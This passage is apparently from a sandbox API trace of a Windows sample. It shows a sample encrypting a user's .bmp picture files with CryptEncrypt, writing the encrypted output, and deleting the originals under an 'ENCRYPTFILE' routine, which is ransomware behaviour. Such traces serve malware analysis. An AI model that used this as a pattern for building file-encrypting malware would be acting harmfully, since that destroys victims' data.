dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0086.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0086.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0086.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0086.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0086.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0086.564] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0086.564] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.564] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0086.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.565] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xc7e0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xc7f0) returned 1 [0086.565] CharLowerBuffW (in: lpsz="byte[51185]", cchLength=0xb | out: lpsz="byte[51185]") returned 0xb [0086.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca898, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.566] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453b7c8*, pdwDataLen=0x144e790*=0xc7e0, dwBufLen=0xc7f0 | out: pbData=0x453b7c8*, pdwDataLen=0x144e790*=0xc7f0) returned 1 [0086.566] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.566] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.566] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xc7f0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144f194*=0xc7f0, lpOverlapped=0x0) returned 1 [0086.568] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0086.568] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0086.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca3d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0086.624] CryptDestroyKey (hKey=0x41ac140) returned 1 [0086.624] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.624] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0086.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0086.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0086.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.625] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0086.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0086.625] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0086.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.625] FreeLibrary (hLibModule=0x756e0000) returned 1 [0086.625] CloseHandle (hObject=0x258) returned 1 [0086.625] CloseHandle (hObject=0x298) returned 1 [0086.628] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp", lpFilePart=0x0) returned 0x2d [0086.628] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\0vl-gmfm9nq0tpej.bmp")) returned 0x20 [0086.629] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da9ae0, ftCreationTime.dwHighDateTime=0x1d5ef3a, ftLastAccessTime.dwLowDateTime=0x802e2550, ftLastAccessTime.dwHighDateTime=0x1d5eeca, ftLastWriteTime.dwLowDateTime=0x802e2550, ftLastWriteTime.dwHighDateTime=0x1d5eeca, nFileSizeHigh=0x0, nFileSizeLow=0xc7e0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0Vl-GMFm9nq0tPej.bmp", cAlternateFileName="0VL-GM~1.BMP")) returned 0x41ac280 [0086.629] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\0vl-gmfm9nq0tpej.bmp")) returned 1 [0086.675] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da9ae0, ftCreationTime.dwHighDateTime=0x1d5ef3a, ftLastAccessTime.dwLowDateTime=0x802e2550, ftLastAccessTime.dwHighDateTime=0x1d5eeca, ftLastWriteTime.dwLowDateTime=0x802e2550, ftLastWriteTime.dwHighDateTime=0x1d5eeca, nFileSizeHigh=0x0, nFileSizeLow=0xc7e0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0Vl-GMFm9nq0tPej.bmp", cAlternateFileName="0VL-GM~1.BMP")) returned 0 [0086.675] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0086.676] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0086.676] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0086.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0086.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0086.677] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0086.677] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0086.677] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0086.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0086.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0086.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0086.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0086.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0086.678] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0086.678] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0086.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0086.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0086.678] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb9d9970, ftCreationTime.dwHighDateTime=0x1d5e4b9, ftLastAccessTime.dwLowDateTime=0xb5223e70, ftLastAccessTime.dwHighDateTime=0x1d5e2a1, ftLastWriteTime.dwLowDateTime=0xb5223e70, ftLastWriteTime.dwHighDateTime=0x1d5e2a1, nFileSizeHigh=0x0, nFileSizeLow=0x8c24, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="5MOGH3JqsJ.bmp", cAlternateFileName="5MOGH3~1.BMP")) returned 0x41ac180 [0086.679] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0086.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0086.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0086.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0086.679] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0086.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0086.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2190 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0086.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0086.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0086.680] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0086.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0086.680] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0086.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0086.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0086.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0086.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0086.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0086.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 